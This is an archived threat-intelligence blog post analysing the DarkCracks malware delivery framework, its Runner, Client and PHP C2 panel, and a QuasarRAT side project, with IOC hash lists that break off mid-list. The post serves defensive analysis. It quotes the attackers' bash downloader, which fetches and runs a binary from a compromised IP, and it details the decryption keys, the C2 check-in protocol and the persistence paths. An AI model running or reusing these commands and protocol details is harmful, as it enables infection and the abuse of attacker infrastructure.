{
	"id": "6f5204ed-2a83-4eb4-b259-f5a98a0251ef",
	"created_at": "2026-04-06T00:18:28.047241Z",
	"updated_at": "2026-04-10T13:12:05.473413Z",
	"deleted_at": null,
	"sha1_hash": "8f5cd75afa28ad746878a11cc39117822e9caeaa",
	"title": "Uncovering DarkCracks: How a Stealthy Payload Delivery Framework Exploits GLPI and WordPress",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 6472629,
	"plain_text": "Uncovering DarkCracks: How a Stealthy Payload Delivery\r\nFramework Exploits GLPI and WordPress\r\nBy Alex.Turing\r\nPublished: 2024-09-04 · Archived: 2026-04-05 16:20:59 UTC\r\nSummary\r\nXLab's Cyber Threat Insight and Analysis system(CTIA) recently detected a sophisticated malicious payload\r\ndelivery and upgrade framework, which we have named DarkCracks. This framework is characterized by its zero\r\ndetection rate on VirusTotal, high persistence, stealth, and a well-designed upgrade mechanism, leveraging high-performance, stable online infrastructure as its backbone.\r\nBased on our data, DarkCracks is a meticulously crafted malware, indicating that its creators are far from mere\r\nscript kiddies. While we have mapped out its payload delivery and upgrade framework, the high level of stealth\r\nemployed by DarkCracks has left us with limited visibility into its Launcher component as of now.\r\nHowever, on August 26th, we observed a new password-protected PDF file named \"resume\" being added to the\r\ngithub repository. This file was later renamed to the Korean name \"김영미 이력서\" (Kim Young-mi's resume) .\r\nGiven the commonality of this Korean name, we strongly suspect that part of this component’s functionality\r\ninvolves social engineering activities targeting Korean-speaking users.\r\nDarkCracks exploits compromised GLPI and WordPress sites to function as Downloaders and C2 servers. These\r\ncompromised sites are used to collect sensitive information from infected devices, maintain long-term access, and\r\nserve as relay nodes to control other devices or deliver malicious payloads, effectively masking the attacker’s\r\nhttps://blog.xlab.qianxin.com/darkcracks-an-advanced-stealthy-payload-delivery-and-upgrade-framework/\r\nPage 1 of 28\n\ntracks. 
Within our monitoring scope, targeted entities include public service systems across different countries,\r\nsuch as school websites, public transportation systems, and even prison visitor systems.\r\nDiscovery Journey\r\nOn June 5, 2024, CTIA issued an ELF_Downloader alert for the network traffic associated with ELF file\r\n8b3d2b156424e5a0dc3f6d2b0dec96b2. The traffic, HTTP in nature, was traced to the download path\r\n/vendor/sabre/event/lib/Promise/wk8dnj2k-x64-musl, which exhibited unusually deep directory structures,\r\nraising suspicions of a potential breach. Upon further investigation, we confirmed that the server at IP\r\n45.169.87.67 had been compromised, with the attack surface being the GLPI system running on that IP. The file\r\nwk8dnj2k-x64-musl was identified as a Runner, responsible for decrypting a JSON configuration file specified\r\nby its parameters, downloading, decrypting, and executing the Client designated in the clientUrl field. The\r\nClient's role is to report the compromised device's information, driven by C2-issued configuration files, and to\r\ndownload updates for the Runner, Client, Launcher, and other components. As of now, both Runner and Client\r\ncomponents have a zero detection rate on VirusTotal, indicating that they have been operating stealthily under the\r\nradar of security vendors for over a year.\r\nOn June 12, 2024, another download script, f8a495a98c43b0805f53be14db09c409, came to our attention. It\r\nutilized a similar download path, /vendor/sebastian/diff/src/Exception/pQ1iM9hd-x64-musl. This file was\r\nstrikingly similar to wk8dnj2k-x64-musl, and the server at IP 179.191.68.85, also running GLPI services, was\r\nfound to host it.\r\nThe appearance of similar files with different names, hosted on different servers and paths, strongly indicated the\r\npresence of an unknown attacker actively breaching GLPI systems and leveraging compromised devices as\r\ninfrastructure to conduct their cybercriminal activities. 
To trace the origins, we embarked on a thorough\r\ninvestigation, uncovering key insights into the samples, configuration files, C2 servers, and targeted victims.\r\n1. The compromised systems were found to belong to critical infrastructure across different countries,\r\nincluding school websites, public transportation systems, and prison visitor systems.\r\n2. Through the XLab command tracking system, we intercepted a directive to change the C2 server, which\r\npointed to a compromised WordPress site.\r\n3. We discovered a GitHub project named \"sudoku1,\" created on July 11, 2023, which stored configuration\r\nfiles.\r\n4. On VirusTotal, we identified an ELF file, c447f7980a18205f309d8432f312fe69, sharing the same origin as\r\nthe Client. The file contained a source path /home/erin/Desktop/Works/smart-update/SmartUpdate/client.\r\n5. XLab proactively contacted the victims, gaining access to the C2 Panel, ultimately uncovering the\r\nworkings of the \"Admin Mode.\"\r\n6. Additionally, we found another GitHub project, \"ftMQPwsMnB,\" containing a decoy file titled \"김영미 이력서\" (Kim Young-mi's resume) and QuasarRAT.\r\nIn conclusion, a well-designed malicious payload delivery and upgrade framework, active for over a year, has\r\ncome into sharp focus. 
This framework, which we have named DarkCracks based on the use of the XOR key\r\n\"Crackalackin,\" leverages compromised GLPI and WordPress sites as Downloaders and C2 servers.\r\nIts primary objectives are to gather sensitive information from infected devices, maintain long-term access, and\r\nuse the compromised, stable, high-performance devices as relay nodes to control other devices or deliver\r\nmalicious payloads, effectively obfuscating the attacker’s footprint.\r\nThe high persistence, stealth, and sophisticated upgrade design, coupled with the strategic selection of stable\r\nonline infrastructure, suggest that the attackers behind this framework are far from ordinary script kiddies.\r\nDespite our current inability to capture the Launcher component and monitor DarkCracks' further activities, the\r\nfact that it has remained undetected by security products for over a year underscores the stealth and efficiency of\r\nits attack methods. This warrants serious attention, and we have documented our findings to share with the\r\nsecurity community.\r\nTargeted Victims\r\nDarkCracks assigns different roles based on the performance of the victim's device: high-performance devices\r\nhandle infrastructure roles, such as C2 and Downloader, while lower-performance devices act as Bot nodes.\r\nDarkCracks targets include WordPress and GLPI. WordPress is a globally recognized web content management\r\nsystem, which I won't elaborate on here. GLPI (Gestionnaire Libre de Parc Informatique) is a lesser-known open-source IT asset and service management system, used to help organizations manage their IT assets, including\r\nhardware, software, and network devices. 
It is widely used in small to medium-sized enterprises, educational\r\ninstitutions, and government agencies to enhance IT infrastructure management and maintenance.\r\nAmong the 13 C2/Downloader instances we observed (compromised devices), there are important targets\r\ninvolving city public transport systems, prison visitor scheduling systems, financial institutions, and other key\r\norganizations across various countries.\r\nAccording to QiAnXin EagleMap, 10,157 GLPI services are currently exposed online. Organizations using GLPI\r\nshould urgently check and secure their systems.\r\nTimeline\r\nBased on the information we have gathered, we have compiled the following timeline of DarkCracks' activities.\r\nPlease note that this is only based on our current intelligence, and DarkCracks' actual activities may have started\r\nearlier.\r\n2023.07.11: The user \"adrhpbrn29\" created the project \"sudoku1\" to store backup configuration files.\r\n2023.07.18: An unencrypted Client was uploaded to VirusTotal from China, with sensitive strings left\r\nunencrypted.\r\n2024.05.23: Runner samples were uploaded to VirusTotal from Poland, South Korea, the Netherlands, the\r\nUK, Germany, and the US. The sensitive strings in these samples were fully encrypted.\r\n2024.06.05: DarkCracks Downloader was first detected when XLab discovered that the IP address\r\n45.169.87.67 had been compromised, hosting multiple Runners (including the ones from May 23rd),\r\nconfiguration files, and Client downloads.\r\n2024.06.06: Analysis of the Runner was completed, successfully decrypting the configuration files and\r\nClient. 
It was found that backup configurations were stored on GitHub, with a version number of SUC 2.0.\r\nSome CPU architecture samples supported DGA (Domain Generation Algorithm).\r\n2024.06.10: An updated C2 command was intercepted, indicating that the new C2 server was a\r\ncompromised WordPress site.\r\n2024.06.12: The IP address 179.191.68.85 was found to be compromised, serving as a download server for\r\nDarkCracks. Backup configurations were stored on Pastebin with a version number of SUC 2.01, with all\r\nCPU architectures supporting DGA.\r\n2024.06.14: A victim provided XLab with implants left by the hackers on their device, including a C2\r\npanel, configuration files, etc.\r\n2024.07.23: Another Runner sample was uploaded to VirusTotal from Finland, Japan, and the US. This\r\nsample did not have encrypted sensitive strings and did not support DGA.\r\n2024.08.23: The user \"adrhpbrn29\" created the project \"ftMQPwsMnB\" to distribute QuasarRAT.\r\nTechnical Details\r\nNext, we'll start with the Downloader and gradually introduce the key components of DarkCracks: Runner, Client,\r\nLauncher, and the C2 Panel. 
By thoroughly analyzing the functions of each component, we aim to clarify the\r\nframework's design principles and uncover how DarkCracks covertly delivers its payloads through these elements.\r\nPart 1: Downloader Analysis\r\nRegarding the Downloader, we've observed two distinct forms: one is a Metasploit Stager that first receives\r\nshellcode to build a shell execution environment before executing a wget download; the other is a bash script\r\nthat directly downloads files via wget or curl.\r\n0x01: Metasploit Stager\r\nMD5: 8b3d2b156424e5a0dc3f6d2b0dec96b2\r\nMagic: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked\r\nThe Stager communicates with 213.139.233.163:18441, generating network traffic as shown below. Its purpose is\r\nto request the file wk8dnj2k-x64-musl from 45.169.87.67.\r\nThe file wk8dnj2k is, in fact, DarkCracks' Runner component. On 45.169.87.67, we discovered multiple variants\r\nof the Runner (wk8dnj2k-{cpu}-{compiler}) compiled for ARM, MIPS, and x86/64 CPU architectures using\r\ndifferent compilers like gnu, uclibc, and musl. 
We also found encrypted Client files (se3hf6jwc-{cpu}-{compiler}) and encrypted configuration files (qoakeifm-unknown.txt).\r\n0x02: Bash Script\r\nMD5: f8a495a98c43b0805f53be14db09c409\r\nMagic: Bourne-Again shell script text executable\r\nThe script's functionality is straightforward: it requests pQ1iM9hd-x64-musl and j8UgL3v from 179.191.68.85.\r\nThe former is a Runner, while the latter is an encrypted configuration file.\r\n#!/bin/bash\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /;\r\nwget \"http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/pQ1iM9hd-x64-musl\" -O wdvsh|curl \"http://179.1\r\nwget http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/j8UgL3v -O agr|curl http://179.191.68.85:82/ven\r\nchmod +x ./wdvsh;\r\n./wdvsh agr;\r\nsleep 3;\r\nrm ./wdvsh;\r\nrm ./agr;\r\nSimilarly, 179.191.68.85 also hosts various DarkCracks entities for different CPU architectures.\r\nPart 2: Runner Analysis\r\nThe Runner hosted on 45.169.87.67, identified as wk8dnj2k-{cpu}-{compiler}, is version 2.0, while the\r\npQ1iM9hd series from 179.191.68.85 is version 2.01. The differences between them are minimal. This analysis\r\nfocuses primarily on the wk8dnj2k Runner for the x64 CPU architecture. Below is its basic information:\r\nName: wk8dnj2k-x64\r\nMD5: 93a7cba1edbacb633021ebc38c10a79f\r\nMagic: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Lin\r\nAs the name suggests, the Runner’s primary function is to act as a launcher, responsible for downloading,\r\ndecrypting, and executing the Client. 
Specifically, when the Runner executes, it first checks the runtime\r\nparameters and supports a maximum of one parameter: an encrypted JSON configuration file. A valid\r\nconfiguration file, once decrypted, must include at least three fields: key (the key and IV needed to decrypt the\r\nClient), emUrl (the download address for the backup configuration file), and clientUrl (the download address\r\nfor the encrypted Client).\r\nUpon validating the configuration file, the Runner creates a working directory at /var/tmp/.shm, moves itself to\r\nthat directory, and renames itself to a UUID-formatted filename. It then generates a new encrypted file,\r\n2b6f92be-6ff1-4b6d-98ce-f5597c69f4b1, with the SH3 field containing the content of the original configuration\r\nfile. The Runner achieves persistence through methods like crontab, .bash_profile, or /etc/init.d/rnd.\r\nFinally, it downloads, decrypts, and executes the Client.\r\nIf no parameter is specified, the Runner checks for the existence of the file /var/tmp/.shm/2b6f92be-6ff1-4b6d-98ce-f5597c69f4b1, retrieves the configuration file through the SH3 field, and proceeds with the decryption,\r\ndownload, and execution of the Client.\r\n0x01: Decrypting Sensitive Strings\r\nTo protect its functionality from easy detection, the Runner pre-encrypts sensitive strings and decrypts them as\r\nneeded using the decstr function.\r\nTo decrypt these strings, one can use flare_emu to emulate the decstr function. 
For example, the ciphertext\r\n“9MwEVEVWWExM5AkO” corresponds to the plaintext “clientUrl.”\r\nimport flare_emu\r\n\r\n# Hook free() so the emulator does not release the decrypted buffer before we read it (return 0 in rax).\r\ndef ignorefree(eh, address, argv, funcName, userData):\r\n    eh.uc.reg_write(eh.regs[\"rax\"], 0)\r\n\r\n# Ciphertext taken from the sample; the expected plaintext is 'clientUrl'.\r\nciphertxt = b'9MwEVEVWWExM5AkO'\r\neh = flare_emu.EmuHelper()\r\neh.apiHooks['free'] = ignorefree\r\n# Emulate decstr (startAddr is its address in the analyzed x64 sample) with rdi pointing at the ciphertext.\r\neh.emulateRange(startAddr=0x00000000000F9D0, skipCalls=False, registers={'rdi': ciphertxt})\r\n# decstr returns a pointer to the decrypted string; read it back from emulated memory.\r\nprint(eh.getEmuString(eh.getRegVal('ret')))\r\nOf course, as a security analysis, a simple black-box decryption is insufficient. After thorough examination, the\r\ndecryption logic of the decstr function can be broken down into three steps:\r\n1. Reverse the string and decode it using Base64 URLSafe mode.\r\n2. XOR each byte with “Crackalackin’”.\r\n3. Swap the case of English letters and decode again using Base64 URLSafe mode.\r\nUsing the IDAPython script in the appendix, the encrypted strings can be restored and patched, making reverse\r\nengineering much easier.\r\n0x02: Decrypting the Configuration\r\nWe captured two configuration files, qoakeifm-unknown and j8UgL3v. These files use the same encryption\r\nmethod as the sensitive strings. 
Once decrypted, it’s noteworthy that the emUrl directs to backup configurations\r\nstored on third-party platforms like GitHub and Pastebin.\r\nConfiguration file qoakeifm-unknown from 45.169.87.67:\r\nConfiguration file j8UgL3v from 179.191.68.85:\r\nEach field in the configuration file is described in the table below:\r\nItem Description\r\nkey AES KEY\u0026IV\r\nurl Client Report Entry\r\nauthHeader Auth String\r\nemUrl Backup Config\r\nrunnerUrl Runner Download URL\r\nclientUrl Client Download URL\r\n0x03: Persistence Mechanism\r\nUpon successfully decrypting a valid configuration file, the Runner creates the working directory\r\n/var/tmp/.shm, moves itself to that directory, renames itself with a UUID, and generates a new encrypted\r\nconfiguration file, 2b6f92be-6ff1-4b6d-98ce-f5597c69f4b1.\r\nAfter moving the file, the Runner achieves persistence using one of the following methods:\r\n1. If the device supports crontab, it uses crontab for persistence.\r\n2. If crontab is unavailable and the current user is a regular user, persistence is achieved through\r\n.bash_profile.\r\n3. If crontab is unavailable and the current user is root, persistence is achieved through /etc/init.d/rnd.\r\n0x04: Downloading the Encrypted Client\r\nThe Runner attempts to download the encrypted Client by iterating through three different types of URLs. If any\r\nof them succeed, the loop exits; otherwise, it waits 6 to 18 hours before trying again. We refer to this as the three-layer URL task polling.\r\nclienturl: Direct mode. 
Simply concatenate the CPU architecture string of the sample to get the Client’s\r\ndownload address.\r\nemurl and dgaurl: Indirect mode. They first download the page pointed to by the URL, locate the backup\r\nconfiguration using the seed_string, then decrypt it to obtain the new clienturl. This forms a\r\nredundant structure where the first layer (clienturl) typically points to compromised sites, which are\r\nunstable and may be cleaned up. The second layer (emurl) points to third-party content hosting platforms,\r\nwhich are more stable but still carry a risk of being banned. The final layer (dgaurl) is generated monthly\r\nas a last resort.\r\nEmUrl\r\nThe process for handling clienturl is straightforward, so let’s focus on emurl and dgaurl. For example, the\r\nemurl in the qoakeifm-unknown configuration file\r\n(https://raw.githubusercontent.com/adrhpbrn29/sudoku1/main/main.cpp) contains the following backup\r\nconfiguration in the seed_string variable.\r\nAfter decrypting the seed_string, the Runner re-enters direct download mode upon obtaining the clienturl.\r\nThe sudoku1 project was created on July 11, 2023, at 17:08:29, with the first record containing seed_string\r\nsubmitted at 17:24:02. 
Currently, there are six submission records.\r\nCommit Date authHeader\r\ne1e10dc 2024.03.28 LJHRQWE\r\nabb67fc 2024.03.13 LJHRQWE\r\n6392b06 2023.12.27 LJHRQWE\r\nc72963b 2023.10.04 SLDJKFA\r\n248c8a8 2023.10.04 Linux Max\r\n5970967 2023.07.11 Rbz021g6\r\nUsing git diff, we verified all submission records and found changes concentrated in the seed_string\r\nvariable in main.cpp, from which we extracted six different clienturl and C2url (details in the IOC section\r\nunder GitHub).\r\nIn the configuration file j8UgL3v, the emurl is https://pastebin[.]com/raw/GYEBVyMR. Besides providing the\r\naforementioned seed_string (details can be found in the Pastebin section of the IOC), it also gives us another\r\nperspective: the IP statistics of visitors to this page. Currently, the number of unique IPs accessing this page is\r\napproaching 300.\r\nDGAUrl\r\nThe logic for handling dgaurl is similar to emurl, but the difference lies in their source. While emurl comes\r\nfrom the configuration file, dgaurl is algorithmically generated. The algorithm is simple: a domain is generated\r\nmonthly by formatting the current “year\u0026month” as “%d%02d”, encrypting it with the string encryption\r\nalgorithm described earlier, and then appending it to “http://%s.com” to form the dgaurl. For example, the DGA\r\ndomain generated for “202408” is UVDFUgOAgjL.com.\r\nWe checked the dgaurl from 2023 to the present (details in the IOC section under DGA) and found that all\r\ndomains are unregistered. 
This indicates that DarkCracks has remained well-hidden, with the emurl mechanism\r\nundetected by the security community, so much so that they haven’t felt the need to activate the final emergency\r\nmeasure.\r\n0x05: Decrypting and Executing the Client\r\nThe Client is encrypted using AES CBC mode, with the decryption key and IV provided in the configuration file’s\r\nkey. The key is a hex string where the first 16 bytes are the key and the last 16 bytes are the IV. The keys in\r\nthe two captured configuration files are identical:\r\n2D8C7FEE42D3DB4A8E55FBFF65351E1BB8ADDBA8FCBD0F85EE1CA5033D0DF342.\r\nAES Key: 2D 8C 7F EE 42 D3 DB 4A 8E 55 FB FF 65 35 1E 1B\r\nAES IV: B8 AD DB A8 FC BD 0F 85 EE 1C A5 03 3D 0D F3 42\r\nOnce the Runner successfully decrypts the Client, it saves it in the /tmp directory, launches it using the execl\r\nfunction, and deletes itself.\r\nPart 3: Client Analysis\r\nIn this section, we'll focus on analyzing the se3hf6jwc-x64 Client. Below are its basic details before and after\r\ndecryption (interested readers can use the CyberChef script provided in the appendix to decrypt the Client).\r\nName: se3hf6jwc-x64\r\nMD5: 81eccc9c10368aa54cfed371f83da45a\r\nMD5: fe5f484f71bf0fd7afa56e60da7eec6f (Decrypted)\r\nMagic: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Lin\r\nUpon analysis, we confirmed that the Client uses a similar architecture to the Runner, namely a \"configuration\r\nfile-driven + three-layer URL task polling\" structure. However, unlike the Runner, which primarily polls the\r\nclientUrl, the Client's focus is on the C2 reporting endpoint specified in the url field of the configuration\r\nfile. 
The Client encrypts and reports sensitive device information to the C2 server, which then sends back\r\nencrypted configurations that drive the execution of different tasks.\r\nKey tasks include:\r\nNewVersion: Download and update the Runner and Client.\r\nNewLauncherVersion: Download and update the Launcher.\r\nversionCheckerUrl: Update the C2 reporting endpoint.\r\n0x01: C2 Communication\r\nThe Client constructs a JSON-formatted beacon with the following code snippet, encrypts it, and sends it as the\r\nHTTP body to the C2 server. The Client supports both HTTP and HTTPS. Notably, the platform field's value is\r\nformatted as \"arch/user(euid)/version\", with the version obtained from /proc/version.\r\nAs seen in actual captured traffic, the body of the interaction is encrypted.\r\nAfter decrypting the C2 response, we see that the Client receives a message with a versionCheckerUrl field. 
The\r\nClient then updates its C2 reporting endpoint and requests a new configuration file:\r\n{\r\n \"versionCheckerUrl\": \"https:\\\\/\\\\/www.miracles.com.hk\\\\/wp-content\\\\/plugins\\\\/foxiplugin\\\\/detail.php\",\r\n \"authHeader\": \"Linux MaEW\"\r\n}\r\n0x02: Speculations on the Launcher Component\r\nWhile we have not captured the Launcher component, we can infer the following details based on how the Client\r\nhandles NewLauncherVersion:\r\nThe Launcher is stored encrypted on a remote server, using AES encryption.\r\nThe Launcher likely supports the same encryption algorithm as the Runner and Client.\r\nThe Launcher is also driven by a configuration file, with core configurations stored at\r\n/var/tmp/.shm/9d8dadaf-6c7e-4975-b26d-ec17e67493c6.\r\n0x03: Evolution of the Client\r\nWe compared the 2.0 and 2.01 versions of the Client samples. The primary differences are whether sensitive\r\nstrings are encrypted and whether the Client supports the DGA algorithm. These changes seem aimed at\r\nenhancing the Client's stealth and robustness.\r\nVersion Encrypted String DGA Support\r\nSUC 2.0 N (x86/x64 Y) N (x86/x64 Y)\r\nSUC 2.01 Y Y\r\nInterestingly, even in SUC 2.0, the x86/64 architecture Client already supported sensitive string encryption and\r\nDGA features. This indicates that DarkCracks takes a cautious approach to feature upgrades, initially testing new\r\nfeatures on select architectures before rolling them out to all architectures once they are fully functional and\r\nstable.\r\nPart 4: C2 Panel Analysis\r\nA user whose device was compromised provided us with the C2 Panel files. 
Below is the basic information about\r\nthe file:\r\nMD5: 8103a187a710378020dbdee8ff213b5b\r\nMD5: 69ef27f8e69dbba222c3c33a53906d79 (Deobfuscated)\r\nObfuscation: Yes\r\nThe file is heavily obfuscated, but it can be deobfuscated by gradually replacing eval with print.\r\nThe C2 Panel is implemented in PHP and consists of around 600 lines of code. Its functionality is relatively\r\nsimple and can be summarized as handling requests from different sources based on a hardcoded configuration\r\nfile, tem9FG5.tmp. It operates in two modes: management mode and business mode.\r\nManagement Mode: This mode handles requests from the Bot Master. The C2 Panel performs operations\r\nlike adding, deleting, modifying, and querying the configuration file based on the request.\r\nBusiness Mode: In this mode, the C2 Panel decides whether to log the Bot or respond to it based on the\r\nconfiguration file.\r\nRequest Source Identification\r\nThe C2 Panel distinguishes the request source using the authentication field. If the field's value is\r\nStatistics, the request is from the Bot Master; otherwise, it's from a Bot. Another role of the authentication\r\nfield is to verify whether the request is from a legitimate Bot. Each C2 Panel has a specific authHeader set\r\nduring initialization, and the C2 only responds when the Bot's authentication matches the C2's authHeader.\r\nConfiguration File (tem9FG5.tmp)\r\nThe configuration file, tem9FG5.tmp, acts like a database, recording the Bot Master's settings and storing\r\ninformation about the Bots. 
To understand the format and fields supported by this configuration file, we generated\r\na configuration file by sending two test requests to a test machine, simulating the initialization and Bot check-in.\r\n1. Initialize the Configuration\r\n{\"authentication\":\"Statistics\",\"isActive\":true,\"authHeader\":\"XLab\"}\r\n2. Bot Check-in\r\n{\"authentication\":\"XLab\",\"uuid\":\"fac60bdc-5786-415e-8992-79abcb132d64\",\"platform\":\"x64 / root(0) / Linux\r\nThe generated network traffic is as follows:\r\nThe C2 Panel on the test machine generated the following encrypted configuration in response to the above\r\nrequests:\r\nDecrypting the configuration file is straightforward, requiring the use of strrev(convert_uudecode($input)).\r\nThe decrypted plaintext matches our constructed requests, indicating that the configuration file is in JSON format.\r\nBot-related information is stored in the clients field, while the authHeader is stored in the config field.\r\nBelow is a description of the fields supported in the configuration file:\r\nField Description\r\nconfig C2 Status\r\nclients Bot info\r\npendingChanges Config to be delivered\r\nsessions Command output from Bot\r\nsessionCommands Commands to be delivered\r\nThe Bot Master uses the pendingChanges and sessionCommands fields to deliver instructions to the Bot. The\r\nfollowing code snippet illustrates how the C2 Panel checks the client's uuid to decide whether to issue the\r\nLauncher configuration.\r\nThe configuration file provided by the victim mentioned a compromised site, soussanart.com. 
We sent a client\r\nquery request to this site and obtained information about 76 clients, spread across 17 countries and involving 4\r\ndifferent versions, ranging from 1.2 to 2.02.\r\nThis concludes our analysis of DarkCracks. Clearly, many puzzles remain unsolved, and we believe this is just the\r\nbeginning of uncovering the full extent of this threat.\r\nPart 5: ftMQPwsMnB Analysis\r\nOn August 23, 2024, as we were wrapping up our previous analysis, we noticed that the user adrhpbrn29 had\r\ncreated a new project named ftMQPwsMnB. The project contains a single compressed file named bzupdater.zip,\r\nwhich includes three files: config.ini, Updater.exe, and version.dll.\r\n0x01: Initial Analysis\r\nA quick analysis confirmed that version.dll is malicious. Its function is to use the AES algorithm to decrypt a\r\nbinary resource, which ultimately yields a shellcode. This shellcode loads a payload that is an open-source remote\r\ncontrol trojan, QuasarRAT. The AES key is FCFF50FB13B09C44F806CF4947381718, and the IV is\r\n2DD695D6845AA9F83F0071B709D78CBD. In addition to AES, XOR encryption is used to decrypt strings, with the\r\nXOR key being quackquack.\r\nCurrently, the ftMQPwsMnB project has five commit records. 
Although the MD5 hash of version.dll varies\r\nwith each commit, there are actually only three different core binaries.\r\nCommit MD5 of version.dll MD5 of \"Binary\"\r\n7ddc62e 456d05566fc3391e195a5f9cb346c92c 91bcbf4de7ff8bddebdc49b62cad1ac1\r\nab75b85 c2d69f5e5fa2af8131f1cb3d9fdfbd4b 05481286a1aa1f0d7d9df7bbbb3aeb73\r\nab6a892 9e94126e8a26efd10b2a5b179d64be90 05481286a1aa1f0d7d9df7bbbb3aeb73\r\n271b28c ceb7f3d92096892410e041a3b318ab9b 05481286a1aa1f0d7d9df7bbbb3aeb73\r\n653eb26 ca93591a9441a2ade70821f67292d982 6176c8374cd656783c9b354944c8052e\r\n0x02: QuasarRAT Payload\r\nQuasarRAT is a well-known remote access Trojan (RAT), and there are numerous analyses available online for\r\nthose interested. In this case, the configurations for the three shellcodes delivering QuasarRAT are nearly\r\nidentical, differing mainly in the C2 server port. For example, the QuasarRAT delivered by the ab75b85 commit\r\nhas the following configuration:\r\nAs of now, we haven't identified the exact distribution method for this project. However, the config.ini file\r\nreferences Bandisoft, a paid software product, suggesting that one potential distribution method could be enticing users to\r\ndownload and install the software by offering a cracked version for free.\r\n0x03: Suspicious PDF File\r\nOn August 26, the project received two additional commit records, adding a PDF file initially named\r\nresume.pdf. This file is password-protected, so we currently do not know its contents. 
About 50 minutes later,\r\nthe file was renamed to the Korean title 김영미 이력서.pdf, which translates to \"Kim Young-mi's resume.\"\r\nResumes are common phishing lures, leading us to speculate that one of DarkCracks' targets might be Korean-speaking users.\r\nDate | Commit | Filename | MD5\r\n2024/08/26 09:19:32 | 5130de3 | resume.pdf | 71ebe71eec7e0f2420cd931534dd22c3\r\n2024/08/26 10:09:27 | a04bf51 | 김영미 이력서.pdf | 71ebe71eec7e0f2420cd931534dd22c3\r\nConclusion\r\nDarkCracks is a well-designed yet flexible payload delivery and upgrade framework with several outstanding\r\nadvantages. For instance, its three-layer URL polling mechanism provides robust reliability, ensuring that\r\npayloads can be delivered even when some delivery methods fail. The framework’s use of encrypted delivery for\r\nmultiple components, along with the self-deletion of these components after execution, effectively safeguards its\r\ncore functionalities from detection.\r\nHowever, there are notable shortcomings. One significant vulnerability lies in its use of a reversible algorithm for\r\ndelivering backup configurations via DGAUrl, which poses the risk of the entire network being hijacked.\r\nAdditionally, the C2 Panel’s management mode is easily accessible; anyone familiar with the protocol can modify\r\nor even wipe the configuration file, potentially leading to the C2’s shutdown and network paralysis.\r\nWe recommend that network administrators monitor the /var/tmp/.shm directory as described above to detect\r\npotential infections. Victims are encouraged to contact us for technical support.\r\nThis is the extent of our current knowledge on DarkCracks. Our analysis is based on our perspective and is\r\nundoubtedly limited. We invite other industry experts with unique insights to contribute additional information,\r\nhelping us refine the profile of DarkCracks. 
If you are interested in our research, you can also contact us via the X\r\nplatform to obtain more detailed information.\r\nIOC\r\nMD5\r\nRunner\r\nc30e9934299fd43527834086b6cfa26a *pQ1iM9hd-armv5-uclibc\r\n8c53e98685fc3ce8b86055991b905926 *pQ1iM9hd-armv6-gnu\r\n257c9ec1241b3fa59565edec9689276b *pQ1iM9hd-armv8-gnu\r\n281e4ede8ffc0f854ce671b5b3ae06f8 *pQ1iM9hd-mips-uclibc\r\n21732589b41506e1e7de87d7066ea43e *pQ1iM9hd-mipsel-uclibc\r\n93a7cba1edbacb633021ebc38c10a79f *pQ1iM9hd-x64\r\n036d6c73fe7a568160f3de8a98d0a58b *pQ1iM9hd-x64-musl\r\n5340ee724893fd596852f22ecbc3e795 *pQ1iM9hd-x86\r\nc6909b8b8bc55fac85c5fe650c7df42a *wk8dnj2k-armv5-uclibc\r\n227d19736af70bef817da96668994af8 *wk8dnj2k-armv6-gnu\r\na18957196842c78cbce2247d766712ad *wk8dnj2k-armv8-gnu\r\n0dd9e350aafe0d1c9e619d27ebd2ccfd *wk8dnj2k-mips-uclibc\r\n8859d9b1c3f41b9dad3cee68adaddd92 *wk8dnj2k-mipsel-uclibc\r\n93a7cba1edbacb633021ebc38c10a79f *wk8dnj2k-x64\r\ne587cd53059f58526be7e2167cf7177b *wk8dnj2k-x64-musl\r\n5340ee724893fd596852f22ecbc3e795 *wk8dnj2k-x86\r\nClient\r\naf93dc3d635ed3b46439e38fae8ecf6b *mY5bJK7e-armv5-uclibc\r\nb0f7df80d2adda176f8d58a55b773eed *mY5bJK7e-armv5-uclibc.decrypted\r\n7d6ea278b5ae9081c03e340d6f98a4a5 *mY5bJK7e-armv6-gnu\r\n635a7ae54cb7966d61e2e8f64391e870 *mY5bJK7e-armv6-gnu.decrypted\r\nc1d07c102e436284d3fbce0410658ae8 *mY5bJK7e-armv8-gnu\r\n11d4db491fe82e37ff0a5c3787cfa143 *mY5bJK7e-armv8-gnu.decrypted\r\n4e64816a821ce2eb231a5be5395a2f20 *mY5bJK7e-mips-uclibc\r\n2e7d67a3be72c5d1718fc2689c0d5d08 *mY5bJK7e-mips-uclibc.decrypted\r\n5e9bf8a980bcc4d004ff505778b843e6 *mY5bJK7e-mipsel-uclibc\r\n527cc24f043c58101c122c2a2f6c6d8e *mY5bJK7e-mipsel-uclibc.decrypted\r\n5b39497af0d9874d38288476d3a9f5a4 *mY5bJK7e-x64\r\ndffee792a8e65d38d897bd3400aecd3d *mY5bJK7e-x64.decrypted\r\n7515282b084374d9d8b87e46b87e4af8 *mY5bJK7e-x64-musl\r\nee0d3c3c528034fa3ebdc37596014382 
